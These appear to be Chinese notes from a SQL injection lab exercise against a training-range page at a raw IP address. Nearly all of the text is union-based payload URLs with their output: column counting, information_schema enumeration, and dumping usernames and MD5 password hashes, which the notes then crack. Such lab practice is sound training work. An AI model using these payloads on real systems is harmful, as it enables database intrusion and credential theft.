判断注入
#猜解列名数量(字段数)
order by 1 2 3 4
4正确5错误有4个字段
http://219.153.49.228:48400/new_list.php?id=1 union select 1,2,3,4
#报错猜解准备
在id=1变为id=-1或id=1 and 2=222
http://219.153.49.228:48400/new_list.php?id=-1%20union%20select%201,2,3,4或
http://219.153.49.228:48400/new_list.phpid=1%20and%202=2222%20union%20select%201,2,3,4
#信息收集
数据库版本:version() 5.7.22-0ubuntu0.16.04.1
数据库名字:database() mozhe_Discuz_StormGroup
数据库用户:user() root@localhost
操作系统:@@version_compile_os Linux
#查询指定数据库名mozhe_Discuz_StormGroup下的表名信息:
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
查询所有:
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
#查询指定表名StormGroup_member下的列名信息
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
#查询指定数据
#猜解多个数据可以采用limit x,1 变动猜解
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1
mozhe
356f589a7df439f6f744ff19bb8092c0 MD5解密 dsan13
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1
mozhe
a26f03bdd67bc4a815c2c30c6daf0ce3 MD5解密 959003